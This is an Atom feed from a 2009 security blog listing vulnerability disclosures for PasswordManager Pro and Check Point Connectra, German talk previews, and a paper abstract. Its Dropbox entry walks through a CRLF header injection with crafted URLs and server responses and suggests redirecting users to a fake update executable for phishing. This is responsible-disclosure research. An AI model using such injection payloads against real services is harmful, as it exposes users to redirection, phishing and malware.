<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
    <title>stfn.ch</title>
    <link rel="alternate" type="text/html" href="http://stfn.ch/" />
    <link rel="self" type="application/atom+xml" href="http://stfn.ch/atom.xml" />
    <id>tag:stfn.ch,2009-12-02://1</id>
    <updated>2009-12-15T09:29:58Z</updated>
    <subtitle>IT-Security Blog - written by Stefan Friedli</subtitle>
    <generator uri="http://www.sixapart.com/movabletype/">Movable Type 4.32-de</generator>

<entry>
    <title>Disclosure: PasswordManager Pro 6.1 Script Injection</title>
    <link rel="alternate" type="text/html" href="http://stfn.ch/2009/12/disclosure-passwordmanager-pro-61-script-injection.html" />
    <id>tag:stfn.ch,2009://1.9</id>

    <published>2009-12-15T09:26:41Z</published>
    <updated>2009-12-15T09:29:58Z</updated>

    <summary>PasswordManager Pro 6.1 Script Injection Vulnerability scip AG Vulnerability ID 4063 (12/15/2009) http://www.scip.ch/?vuldb.4063 Stefan Friedli at scip AG (Switzerland) found an input validation error within the current release, which enabled an attacker to perform various web-based attacks. The processing method...</summary>
    <author>
        <name>Stefan Friedli</name>
        
    </author>
    
        <category term="English" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="Veröffentlichungen" scheme="http://www.sixapart.com/ns/types#category" />
    
    <category term="disclosure" label="disclosure" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="passwordmanagerpro" label="password manager pro" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="pmp" label="pmp" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="scip" label="scip" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="scriptinjection" label="script injection" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="vulnerability" label="vulnerability" scheme="http://www.sixapart.com/ns/types#tag" />
    
    <content type="html" xml:lang="de" xml:base="http://stfn.ch/">
        <![CDATA[<p><strong>PasswordManager Pro 6.1 Script Injection Vulnerability</strong><br />
scip AG Vulnerability ID 4063 (12/15/2009) <a href="http://www.scip.ch/?vuldb.4063">http://www.scip.ch/?vuldb.4063</a></p>

<p>Stefan Friedli at scip AG (Switzerland) found an input validation error within the current release, which enabled an attacker to perform various web-based attacks.</p>

<p>The processing method for the search function fails to perform proper input validation on the data that is being submitted via <span class="caps">HTTP GET.</span> The parameter "searchtext" lacks validation and is therefore vulnerable to script injection. While there is a basic input filterting method in place, it fails to detect more advanced (e.g. encoded) payloads.<br />
Other parts of the application might be affected too.</p>

<p>This vulnerability has been tested on version 6.1, other versions might be affected as well.</p>


<p><strong>Advisory:</strong><br />
<a href="http://www.scip.ch/publikationen/advisories/scip_advisory-4063_manageengine_pmp_script_injection.txt">PasswordManager Pro 6.1 Script Injection Vulnerability</a></p>]]>
        
    </content>
</entry>

<entry>
    <title>Details on the Dropbox.com HTTP Header Injection Vulnerability</title>
    <link rel="alternate" type="text/html" href="http://stfn.ch/2009/12/details-on-the-dropbox-http-header-injection-vulnerability.html" />
    <id>tag:stfn.ch,2009://1.8</id>

    <published>2009-12-14T11:40:03Z</published>
    <updated>2009-12-14T12:05:25Z</updated>

    <summary> Dropbox is a cloud-based storage application and service operated by Dropbox, Inc. The service enables users to store and sync files online and between computers and share files and folders with others. [Source: Wikipedia] It&apos;s an amazing tool and...</summary>
    <author>
        <name>Stefan Friedli</name>
        
    </author>
    
        <category term="English" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="Veröffentlichungen" scheme="http://www.sixapart.com/ns/types#category" />
    
    <category term="dropbox" label="dropbox" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="httpheaderinjection" label="http header injection" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="vulnerability" label="vulnerability" scheme="http://www.sixapart.com/ns/types#tag" />
    
    <content type="html" xml:lang="de" xml:base="http://stfn.ch/">
        <![CDATA[<p><img src="http://stfn.ch/resources/20091212/dropbox-transparent.png" alt="" /></p>

<blockquote><p>Dropbox is a cloud-based storage application and service operated by Dropbox, Inc. The service enables users to store and sync files online and between computers and share files and folders with others. [Source: <a href="http://en.wikipedia.org/wiki/Dropbox">Wikipedia</a>]</p></blockquote>

<p>It's an amazing tool and I love it to sync my non-sensitive stuff between my computers and my iPhone. I mean, it's free, it's functional and it keeps me from carrying around data on an usb stick.</p>

<p>However, while I can recommend Dropbox from a usability perspective, I was quite curious, how the application would handle security issues.</p>

<p>When using Dropbox, you are given several possibilities to access your data. The easiest is to install the Dropbox client, which creates a Dropbox folder in your, OS-specific, Documents folder and adds some nifty context-menu extensions to allow direct interaction in order to display file changes, access data online, share stuff etc.</p>

<p>Now, you might have a folder of... well, anything that you want to browse on the Dropbox website instead of your own filesystem, for whatever reason. Now you go to Dropbox.com, log in, browse to the folder and there you are. Or: You just rightclick on that folder, select "Browse on Dropbox website", get your existing session converted to a websession which makes authentication unnecessary and, there you go.</p>

<p>When you chose the lazy way, this is what happens.<br />
Your browse is opening up and a <span class="caps">URI </span>like the following is being opened up (Yes, the variable values have been changed to prevent people tinkering around with my Dropbox account...):</p>



<pre>
https://www.dropbox.com/tray_login?i=372832&amp;t=1260625705&amp;v=f1a9afcb67f2372780f3893d170de164f070cb84&amp;url=c%2Fbrowse%2FPhotos%3Fns_id%3D711010
</pre>



<p>Or, if you replace the query fields by their suspected content:</p>


<pre>
https://www.dropbox.com/tray_login?i={Dropbox ID}&amp;t={Timestamp}&amp;v={Verification String}&amp;url={Whatever Directory you want to access}
</pre>



<p>This is what your browser does. It's sending some authentication data along with a timestamp and the directory you want to see. Now the server processes this data and - if you're lucky enough to get authenticated - you will get back a <span class="caps">HTTP</span>/302 reply, which sets the necessary cookies to get an authenticated session in your browser and redirects you using the Location: Header and the value of the "uri" Parameter your client submitted.</p>



<pre>
HTTP/1.1 302 FOUND
Server: nginx/0.7.63
Date: Sat, 12 Dec 2009 13:48:26 GMT
Content-Type: text/html; charset=utf-8
X-Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: lid=YADDAYADDAYADDAYADDAYADDAYADDA; Domain=www.dropbox.com; expires=Sun, 12-Dec-2010 13:48:26 GMT; Path=/; httponly
set-cookie: forumjar=YADDAYADDAYADDAYADDAYADDAYADDA; Domain=dropbox.com; expires=Sun, 12-Dec-2010 13:48:26 GMT; Path=/; httponly
set-cookie: taste=YADDAYADDAYADDAYADDAYADDAYADDAYADDAYADDAYADDAYADDAYADDAYADDAYADDAYADDAYADDAYADDAYADDAYADDAYADDAYADDAYADDA; Domain=dropbox.com; expires=Sun, 12-Dec-2010 13:48:26 GMT; Path=/; httponly
set-cookie: jar=YADDAYADDAYADDA; Domain=www.dropbox.com; expires=Sun, 12-Dec-2010 13:48:26 GMT; Path=/; httponly
set-cookie: touch=YADDA; Domain=dropbox.com; expires=Sun, 12-Dec-2010 13:48:26 GMT; Path=/; httponly
set-cookie: forumlid=YADDAYADDAYADDA; Domain=dropbox.com; expires=Sun, 12-Dec-2010 13:48:26 GMT; Path=/; httponly
location: /c/browse/Photos?ns_id=711010
pragma: no-cache
cache-control: no-cache
Content-length: 324

&lt;html&gt;
  &lt;head&gt;&lt;title&gt;Found&lt;/title&gt;&lt;/head&gt;
  &lt;body&gt;
    &lt;h1&gt;Found&lt;/h1&gt;
    &lt;p&gt;The resource was found at &lt;a href=&quot;/c/browse/Photos?ns_id=711010&quot;&gt;/c/browse/Photos?ns_id=711010&lt;/a&gt;;
you should be redirected automatically.
<!--  -->&lt;/p&gt;
    &lt;hr noshade&gt;
    &lt;div align=&quot;right&quot;&gt;WSGI Server&lt;/div&gt;
  &lt;/body&gt;
&lt;/html&gt;
</pre>



<p>Wait. It uses the "uri" parameter in a <span class="caps">HTTP </span>header? Oh, okay. That's... interesting. Let's try something:</p>



<pre>
https://www.dropbox.com/tray_login?i=x&amp;t=y&amp;v=z&amp;url=Whatever%0d%0aX-AllYourBase:%20Are%20belong%20to%20us
</pre>



<p>Now let's just fire up WebScarab and see what we get here...</p>



<pre>
HTTP/1.1 302 FOUND
Server: nginx/0.7.63
Date: Sat, 12 Dec 2009 14:04:52 GMT
Content-Type: text/html; charset=utf-8
X-Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: frmtry=MQ%3D%3D; Path=/; httponly
location: /Whatever
*X-AllYourBase: Are belong to us*
pragma: no-cache
cache-control: no-cache
Content-length: 348
</pre>



<p>Oh. They don't validate the uri parameter then. We can inject our own headers. Lucky for us, the vulnerable parameter is appended to the "location:" header line, so if we append another one of those, most browsers will resort to use the last one. </p>



<pre>
https://www.dropbox.com/tray_login?i=x&amp;t=y&amp;v=z&amp;url=Whatever%0d%0aLocation:%20http://www.scip.ch

HTTP/1.1 302 FOUND
Server: nginx/0.7.63
Date: Sat, 12 Dec 2009 14:10:50 GMT
Content-Type: text/html; charset=utf-8
X-Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: frmtry=MQ%3D%3D; Path=/; httponly
location: /Whatever
Location: http://www.scip.ch
pragma: no-cache
cache-control: no-cache
Content-length: 342
</pre>



<p>You click on a http://www.dropbox.com/... link and end up on our corporate website. Nice. We could try to redirect people to http://whateveryoulike.tld/dropbox_update.exe instead, which would fit nicely in a phishing attack.</p>

<p>Or, we could inject something completely else... like initiating a <a href="http://www.owasp.org/index.php/HTTP_Response_Splitting"><span class="caps">HTTP</span> Response Splitting</a> attack by injecting another <span class="caps">HTTP </span>response header with status code 200 and some nifty javascript magic or Metasploits good old browser_autopwn to work. Use your imagination ;).</p>

<p><a href="http://www.dropbox.com">Dropbox</a> has been informed about this issue and will hopefully patch their servers soon in order to prevent you from being redirected to your next favourite ZeuS tracker ;).</p>

<p>While I was researching this issue, Nathan Hamiel came up with a rather similar issue: The enumeration of Dropbox user accounts using sequential account numbers for public file paths. You should check out his article <a href="http://www.neohaxor.org/2009/12/11/enumerating-dropbox-resources/">here</a>.</p>]]>
        
    </content>
</entry>

<entry>
    <title>)talk( 3/09 - Preview: Exploiting</title>
    <link rel="alternate" type="text/html" href="http://stfn.ch/2009/11/talk-309---preview-exploiting.html" />
    <id>tag:stfn.ch,2009://1.6</id>

    <published>2009-11-03T11:56:10Z</published>
    <updated>2009-12-03T12:07:09Z</updated>

    <summary>Während das Jahr langsam zur Neige geht, kommt auch der Termin für den dritten und letzten )talk( stetig näher. Mein technisches Segment für dieses Mal beschäftigt sich dediziert mit Exploiting. Eine Schwachstelle macht noch keinen Sommer, so oder ähnlich sagt...</summary>
    <author>
        <name>Stefan Friedli</name>
        
    </author>
    
        <category term="Deutsch" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="Events" scheme="http://www.sixapart.com/ns/types#category" />
    
    <category term="exploiting" label="exploiting" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="scip" label="scip" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="talk" label="talk" scheme="http://www.sixapart.com/ns/types#tag" />
    
    <content type="html" xml:lang="de" xml:base="http://stfn.ch/">
        <![CDATA[<p>Während das Jahr langsam zur Neige geht, kommt auch der Termin für den dritten und letzten )talk( stetig näher. Mein technisches Segment für dieses Mal beschäftigt sich dediziert mit <strong>Exploiting</strong>.</p>

<p>Eine Schwachstelle macht noch keinen Sommer, so oder ähnlich sagt man im Volksmund. Tatsächlich bringt eine Schwachstelle einem Angreifer nur einen Vorteil, wenn sie in irgend einer Form ausnutzbar ist.</p>

<p>Wie aus einer <span class="caps">SQL</span> Injection Schwachstelle plötzlich eine Shell werden kann, wie verschiedene Payloads funktionieren und welche Sicherheitsmassnahmen gegen welche Arten von Angriffen nutzlos sind, soll im Rahmen der Präsentation erläutert werden.</p>

<p>Ausserdem auf der Agenda: scip AG Ankündigungen für die )talk( Events in 2010.</p>

<p><strong>scip )talk( 03/09</strong><br />
11. November 2009, Zurich<br />
Invite Only (www.scip.ch)</p>]]>
        
    </content>
</entry>

<entry>
    <title>scip Labs: Grundlegende Javascript Malware Analyse: Ein Beispiel</title>
    <link rel="alternate" type="text/html" href="http://stfn.ch/2009/10/scip-labs-grundlegende-javascript-malware-analyse-ein-beispiel.html" />
    <id>tag:stfn.ch,2009://1.7</id>

    <published>2009-10-27T12:54:14Z</published>
    <updated>2009-12-04T13:58:56Z</updated>

    <summary>Einleitung: (...) Für die Sicherheit der eigenen Web Applikation zu sorgen, ist die Verantwortung jedes Webseitenbetreibers. Doch wird eine Seite kompromittiert, so muss adäquat reagiert werden. Gerade wenn eine Webpräsenz dazu missbraucht wird, deren Benutzer mit Schadsoftware oder Exploits zu...</summary>
    <author>
        <name>Stefan Friedli</name>
        
    </author>
    
        <category term="Deutsch" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="Veröffentlichungen" scheme="http://www.sixapart.com/ns/types#category" />
    
    <category term="javascript" label="javascript" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="labs" label="labs" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="malwareanalayse" label="malware analayse" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="obfuscation" label="obfuscation" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="scip" label="scip" scheme="http://www.sixapart.com/ns/types#tag" />
    
    <content type="html" xml:lang="de" xml:base="http://stfn.ch/">
        <![CDATA[<a href="http://stfn.ch/2009/10/28/091027_malwareanalyse.png"><img alt="091027_malwareanalyse.png" src="http://stfn.ch/assets_c/2009/12/091027_malwareanalyse-thumb-300x231-2.png" class="mt-image-none" style="" height="231" width="300" /></a><div><br />Einleitung: <br /><br /><blockquote><p>(...) Für die Sicherheit der eigenen Web Applikation zu sorgen, ist die
Verantwortung jedes Webseitenbetreibers. Doch wird eine Seite
kompromittiert, so muss adäquat reagiert werden. Gerade wenn eine
Webpräsenz dazu missbraucht wird, deren Benutzer mit Schadsoftware oder
Exploits zu attackieren, ist eine Klärung der Umstände unabdinglich, um
eine professionelle Reaktion zu gewährleisten und den schier
unabwendbaren Reputationsschaden möglichst gering zu halten.</p><p><em>Wie</em>
soll man jedoch im Detail herausfinden, was der auf der eigenen Seite
befindliche Schadcode tut und dies auch noch in einer nachvollziehbaren
und sicheren Weise? Der Ansatz, der hier in der Regel gewählt wird, ist
eine strukturierte Analyse des Schadcodes, den ich im Folgenden an
einem konkreten Beispiel erklären möchte. (...)<br /></p></blockquote>

	<p><a href="http://www.scip.ch/?labs">Artikel auf www.scip.ch</a><br /></p><br /><br /></div>]]>
        
    </content>
</entry>

<entry>
    <title>Disclosure: Check Point Connectra Script Injection</title>
    <link rel="alternate" type="text/html" href="http://stfn.ch/2009/09/disclosure-check-point-connectra-script-injection.html" />
    <id>tag:stfn.ch,2009://1.5</id>

    <published>2009-09-21T14:30:16Z</published>
    <updated>2009-12-15T09:28:17Z</updated>

    <summary>Check Point Connectra R62 Login Script Injection Vulnerability scip AG Vulnerability ID 4020 (09/04/2009) http://www.scip.ch/?vuldb.4020 Stefan Friedli at scip AG (Switzerland) found an input validation error within the current release, which enabled an attacker to perform various web-based attacks. The...</summary>
    <author>
        <name>Stefan Friedli</name>
        
    </author>
    
        <category term="English" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="Veröffentlichungen" scheme="http://www.sixapart.com/ns/types#category" />
    
    <category term="checkpoint" label="checkpoint" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="disclosure" label="disclosure" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="scriptinjection" label="script injection" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="vulnerabilites" label="vulnerabilites" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="xss" label="xss" scheme="http://www.sixapart.com/ns/types#tag" />
    
    <content type="html" xml:lang="de" xml:base="http://stfn.ch/">
        <![CDATA[<p><strong>Check Point Connectra <span class="caps">R62</span> Login Script Injection Vulnerability</strong><br />
scip AG Vulnerability ID 4020 (09/04/2009) <a href="http://www.scip.ch/?vuldb.4020">http://www.scip.ch/?vuldb.4020</a></p>

<p>Stefan Friedli at scip AG (Switzerland) found an input validation error within the current release, which enabled an attacker to perform various web-based attacks.</p>

<p>The initial logon script at /Login/Login, that is being used for unauthenticated users to log in, fails to perform proper input validation on the data that is being submitted via <span class="caps">HTTP POST.</span> While certain fields are escaped before being sent back to users browser, the parameter "vpid_prefix" lacks any validation and is therefore vulnerable to script injection.<br />
Other parts of the application might be affected too.</p>

<p>This vulnerability has been tested on version <span class="caps">R62, </span>other versions might be affected as well.</p>

<p><strong>Advisory:</strong><br />
<a href="http://www.scip.ch/publikationen/advisories/scip_advisory-4020_checkpoint_connectra_r62_script_injection.txt">Check Point Connectra <span class="caps">R62</span> Login Script Injection Vulnerability</a><br />
<strong>Secunia:</strong><br />
<a href="http://secunia.com/advisories/36821/2/">Check Point Connectra vpid_prefix Cross-Site Scripting</a><br />
<strong>Securityfocus:</strong><br />
<a href="http://www.securityfocus.com/bid/36466">Check Point Connectra '/Login/Login' Arbitrary Script Injection Vulnerability</a><br />
<strong><span class="caps">VUPEN</span>:</strong><br />
<a href="http://www.vupen.com/english/advisories/2009/2717">Check Point Connectra vpid_prefix Cross Site Scripting Vulnerability</a></p>

<p><strong><span class="caps">UPDATE</span>:</strong><br />
Other versions <em>are</em> affected too. See <a href="https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&amp;solutionid=sk42793">Checkpoints official response</a> for details.</p>]]>
        
    </content>
</entry>

<entry>
    <title>)talk( 2/09 - Preview: Smartphones</title>
    <link rel="alternate" type="text/html" href="http://stfn.ch/2009/08/talk-209---preview-smartphones.html" />
    <id>tag:stfn.ch,2009://1.4</id>

    <published>2009-08-26T15:13:52Z</published>
    <updated>2009-12-03T12:08:34Z</updated>

    <summary>Nächste Woche findet der zweite )talk( des Jahres 2009 in Zürich statt. Im Zentrum steht dieses Mal das Thema Smartphones. Auch dieses Mal werde ich, diesmal in Zusammenarbeit mit Marc, ein technisches Segment präsentieren, dass sich konkret mit Angriffsvektoren auf...</summary>
    <author>
        <name>Stefan Friedli</name>
        
    </author>
    
        <category term="Deutsch" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="Events" scheme="http://www.sixapart.com/ns/types#category" />
    
    <category term="iphone" label="iphone" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="scip" label="scip" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="smartphone" label="smartphone" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="talk" label="talk" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="windowsmobile" label="windows mobile" scheme="http://www.sixapart.com/ns/types#tag" />
    
    <content type="html" xml:lang="de" xml:base="http://stfn.ch/">
        <![CDATA[<p>Nächste Woche findet der zweite )talk( des Jahres 2009 in Zürich statt. Im Zentrum steht dieses Mal das Thema <strong>Smartphones</strong>. Auch dieses Mal werde ich, diesmal in Zusammenarbeit mit Marc, ein technisches Segment präsentieren, dass sich konkret mit Angriffsvektoren auf aktuelle Smartphones, darunter Windows Mobile 6.1/6.5 und das Apple iPhone bezieht.</p>

<p>Konkret geht es darum, dass die genannten Geräte, neben diversen weiteren, immer stärker in modernen Unternehmensnetzwerken eingesetzt werden. Interessant ist das in erster Linie deshalb, weil die Funktionalität und die Leistungsfähigkeit dieser Handhelds längst an die Notebooks heranreichen, die wir vor einigen Jahren noch "performant" nannten. Während sich die üblichen Sicherheitsvorkehrungen für eben jene Notebooks sich seither doch um ein ganzes Stück verändert haben, werden Smartphones oftmals immer noch gleich behandelt, wie das altehrwürdige Nokia 3210: Als Mobiltelefon.</p>

<p>Wie Smartphones im Rahmen dedizierter Penetrationstest als Angriffsmedium verwendet werden können und wo die Grenzen des mobilen Exploitings liegen, soll im Rahmen des Vortrags "Smartphones: Angels and Demons" besprochen werden. </p>

<p><strong>scip )talk( 02/09</strong><br />
02. September 2009, Zurich<br />
Invite Only (www.scip.ch)</p>]]>
        
    </content>
</entry>

<entry>
    <title>Paper: Vulnerable Web Application Enumeration</title>
    <link rel="alternate" type="text/html" href="http://stfn.ch/2009/03/paper-vulnerable-web-application-enumeration.html" />
    <id>tag:stfn.ch,2009://1.2</id>

    <published>2009-03-27T18:30:21Z</published>
    <updated>2009-12-03T12:08:29Z</updated>

    <summary>Abstact:This paper discusses the automatic enumeration and fingerprinting of web applications. In this case, the popular WordPress blogging software was usedas an example to gain insight about the patch levels in &quot;casual&quot; environments. Deprecated versions of WordPress are known to...</summary>
    <author>
        <name>Stefan Friedli</name>
        
    </author>
    
        <category term="English" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="Veröffentlichungen" scheme="http://www.sixapart.com/ns/types#category" />
    
    <category term="paper" label="paper" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="vulnerabilites" label="vulnerabilites" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="webapps" label="webapps" scheme="http://www.sixapart.com/ns/types#tag" />
    
    <content type="html" xml:lang="de" xml:base="http://stfn.ch/">
        <![CDATA[<b>Abstact:</b><br />This paper discusses the automatic enumeration and fingerprinting of web applications. In this case, the popular WordPress blogging software was usedas an example to gain insight about the patch levels in "casual" environments. <br /><br />Deprecated versions of WordPress are known to include several critical vulnerabilities, which make them an easy target to compromise systems in order to perform browser-based exploitation on their visitors or use the underlying infrastructure for several malicious purposes, for example sending spam or hosting malware.<br /><br />In the first part of the paper, the technical solution to identify installations of the target application using openly available technology is being discussed. Further, the basic method of fingerprinting different versions of WordPress<br />(1.2 up to 2.7.1) are being illustrated.<br /><br />In the second part of this document, some analysis of a enumeration scenario can be found. The scenario includes the enumeration, fingerprinting and analysis of thousand blogs powered by WordPress in Switzerland and Liechtenstein of which 60 per cent were found to be deprecated and partly prone to certain well-known security vulnerabilities.<br /><br /><b>Sprache:</b> Englisch<br /><b>Download:</b> <a href="http://fadetoblack.ch/research/paper_vwae.pdf"><span class="caps">PDF</span>,
450kb</a> ]]>
        
    </content>
</entry>

<entry>
    <title>)talk( 1/09 - Preview: Configuration Management</title>
    <link rel="alternate" type="text/html" href="http://stfn.ch/2009/03/talk-109---preview-configuration-management.html" />
    <id>tag:stfn.ch,2009://1.3</id>

    <published>2009-03-11T19:16:19Z</published>
    <updated>2009-12-03T12:07:55Z</updated>

    <summary>Nächste Woche findet die erste Ausgabe des scip )talk( im Jahr 2009 statt. Wie auch schon in 2008, werde ich ein technisches Segment präsentieren - und wie gehabt gibt es daher im Vorfeld schon ein paar Informationen zum besprochenen Thema.Taming...</summary>
    <author>
        <name>Stefan Friedli</name>
        
    </author>
    
        <category term="Deutsch" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="Events" scheme="http://www.sixapart.com/ns/types#category" />
    
    <category term="configuration" label="configuration" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="scip" label="scip" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="ssl" label="ssl" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="talk" label="talk" scheme="http://www.sixapart.com/ns/types#tag" />
    
    <content type="html" xml:lang="de" xml:base="http://stfn.ch/">
        <![CDATA[Nächste Woche findet die erste Ausgabe des scip )talk( im Jahr 2009 statt. Wie auch schon in 2008, werde ich ein technisches Segment präsentieren - und wie gehabt gibt es daher im Vorfeld schon ein paar Informationen zum besprochenen Thema.<br /><br /><strong>Taming a Beast with a Thousand Heads: Configuration Management</strong><br /><br />Wir propagieren grundsätzlich sehr oft eine transparente Herangehensweise für Sicherheitsüberprüfungen. Gerade in komplexen Umgebungen macht es oftmals schlicht und ergreifend keinen Sinn, in einem sehr limitierten Zeitrahmen die oft zitierte Nadel im Heuhaufen - in diesem Fall eine kritische Schwachstelle - zu suchen.<br /><br />Wenn Umgebungen periodisch geprüft werden, so wird ab einem gewissen Punkt gerne auf Konfigurationsanalysen zurückgegriffen. Die populärsten Form ist dabei die Analyse von Firewall Regelwerken, aber auch die Einstellungen artverwandter Gerätschaften, wie zum Beispiel Reverse Proxies, werden gerne auf diese Art und Weise untersucht.<br /><br />Das Ziel einer Konfigurationsanalyse ist relativ simpel: Es werden Einstellungen gesucht, die eine negative Implikation auf die Sicherheit des Systems besitzen. Diese werden anschliessend bewertet (Kritikalität, Wahrscheinlichkeit, etc.) und mit Gegenmassnahmen versehen dokumentiert. Ein Beispiel wäre im Fall eines Apache Servers die Zeile: <br /><br /><pre>SSLProtocol ALL</pre>Diese Direktive würde bemängelt werden, weil sie SSLv2 unterstützt, was aus <a href="http://www.gnu.org/software/gnutls/manual/html_node/On-SSL-2-and-older-protocols.html">verschiedenen Gründen</a> unerwünscht ist. Es würde daher empfohlen werden, die Zeile dahingehend zu modifizieren, dass SSLv2 nicht mehr erlaubt wird:<br /><br /><pre>SSLProtocol ALL -SSLv2</pre>Es würde als weitere Massnahme vorgeschlagen werden, dass eine themenverwandte Direktive eingesetzt werden sollte, um einen bestimmten Effekt, zu erreichen. In diesem Fall würde empfohlen werden, nur als kryptografisch sicher geltende Algorithmen zuzulassen. Dies entspricht der Konfiguration, die benötigt wird um <a href="http://en.wikipedia.org/wiki/Payment_Card_Industry_Data_Security_Standard">PCI Compliance</a> zu erreichen:<br /><br /><pre>SSLCipherSuite HIGH:!SSLv2:!ADH:!aNULL:!eNULL:!NULL</pre><br />In einem kompakten, klar abgesteckten Kontext, ist eine solche Analyse relativ simpel: Meistens ist höchstens eine handvoll Dateien mit ein paar Dutzend sicherheitsrelevanten Direktiven zu betrachten.<br /><br />Interessant wird es aber, wenn plötzlich mehrere hundert Systemkonfigurationen mit tausenden (!) Konfigurationsdirektiven eines Dienstes normalisiert, analysiert und untereinander nach verschiedenen Kriterien verglichen werden sollen. Wie eine solche Analyse realisiert werden kann und was dabei beachtet werden muss, ist eines der weitergehenden Themen, auf das ich im )talk( eingehen werde.<br /><br /><b>scip )talk( 01/09</b><br />18. März 2009, Zurich<br />Invite Only (www.scip.ch)<br />]]>
        
    </content>
</entry>

</feed>
